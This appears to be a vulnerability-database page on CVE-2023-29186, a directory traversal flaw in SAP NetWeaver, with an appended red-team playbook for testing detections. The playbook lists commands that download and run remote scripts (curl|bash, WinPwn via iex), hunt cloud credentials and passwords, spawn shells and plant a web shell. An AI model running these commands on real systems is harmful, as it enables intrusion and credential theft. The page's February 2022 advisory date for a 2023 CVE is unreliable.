CVE-2023-29186
Overview
This vulnerability is a directory traversal flaw in SAP NetWeaver (BI CONT ADDON) versions 707, 737, 747, and 757. The root cause lies in insufficient validation of file path inputs within a report component, allowing crafted requests to traverse directories and overwrite files on the server filesystem. The affected component improperly sanitizes user-controlled input used in file upload or overwrite operations, enabling unauthorized file manipulation under certain privilege conditions.
Vulnerability Description
In SAP NetWeaver (BI CONT ADDON) - versions 707, 737, 747, 757, an attacker can exploit a directory traversal flaw in a report to upload and overwrite files on the SAP server. Data cannot be read but if a remote attacker has sufficient (administrative) privileges then potentially critical OS files can be overwritten making the system unavailable.
Impact
An attacker with administrative privileges on the SAP NetWeaver server can exploit this vulnerability to overwrite critical operating system files, potentially causing system unavailability or denial of service. Although data confidentiality is not directly compromised, the ability to overwrite files can disrupt normal operations and lead to service outages. The attack requires network access and elevated privileges (PR:H), and no user interaction is needed (UI:N). This elevates the risk of targeted sabotage or disruption within affected SAP environments.
Solution
SAP has released security updates addressing this directory traversal vulnerability in SAP NetWeaver (BI CONT ADDON) versions 707, 737, 747, and 757. Administrators should apply the patches detailed in SAP Note 3305907 and follow the instructions provided in the official SAP security advisory published in February 2022 at https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html. These updates correct the input validation mechanisms to prevent unauthorized file overwrites. No alternative workarounds are documented by SAP.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in specific versions of SAP NetWeaver, particularly within the BI CONT ADDON, is characterized by a directory traversal flaw. This type of vulnerability allows an attacker to manipulate file paths in such a way that they can access directories and files that are outside the intended scope of the application. In this case, the flaw enables an attacker to upload and overwrite files on the SAP server. While the vulnerability does not allow for the reading of sensitive data, it poses a significant risk if exploited by an attacker with administrative privileges, as they could potentially overwrite critical operating system files, leading to system unavailability.
Attack vectors for this vulnerability are primarily web-based, where an attacker could exploit the flaw through crafted requests to the SAP application. By leveraging the directory traversal vulnerability, an attacker could upload malicious files or overwrite existing files that are crucial for the operation of the SAP server. Scenarios may include an attacker gaining access to the application through phishing or other social engineering tactics, subsequently executing crafted requests that exploit the flaw. The potential for exploitation increases if the attacker has already obtained administrative privileges, as this would allow them to target sensitive system files directly, amplifying the impact of the attack.
The real-world impact of this vulnerability can be severe, particularly for organizations that rely on SAP NetWeaver for critical business operations. An attacker successfully exploiting this vulnerability could lead to significant downtime, loss of availability, and disruption of services. The consequences could extend beyond immediate operational impacts to include reputational damage, loss of customer trust, and potential financial losses due to recovery efforts and remediation. Furthermore, if sensitive data were to be compromised in conjunction with this vulnerability, the organization could face regulatory scrutiny and legal ramifications.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-layered security approach. Regular security assessments and penetration testing can help identify vulnerabilities before they are exploited. Additionally, monitoring and logging access to the SAP application can provide insights into potential exploitation attempts. Organizations should also ensure that they apply security patches and updates promptly to mitigate known vulnerabilities. Implementing strict access controls and ensuring that administrative privileges are granted only to necessary personnel can further reduce the risk of exploitation. Additionally, employing web application firewalls (WAFs) can help filter out malicious requests that attempt to exploit such vulnerabilities.
In conclusion, the directory traversal vulnerability in SAP NetWeaver poses a significant risk to organizations utilizing this platform. The potential for file overwriting, especially by an attacker with administrative access, can lead to severe operational impacts and business risks. By adopting proactive detection and mitigation strategies, organizations can safeguard their systems against this and similar vulnerabilities, ensuring the integrity and availability of their critical applications.
Affected Products (4)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Sap | Netweaver | 707 |
cpe:2.3:a:sap:netweaver:707:*:*:*:*:*:*:*
|
|
|
Sap | Netweaver | 737 |
cpe:2.3:a:sap:netweaver:737:*:*:*:*:*:*:*
|
|
|
Sap | Netweaver | 747 |
cpe:2.3:a:sap:netweaver:747:*:*:*:*:*:*:*
|
|
|
Sap | Netweaver | 757 |
cpe:2.3:a:sap:netweaver:757:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-29186 |
| launchpad.support.sap.com |
GitHub CVE
|
https://launchpad.support.sap.com/#/notes/3305907 |
| sap.com |
GitHub CVE
|
https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html |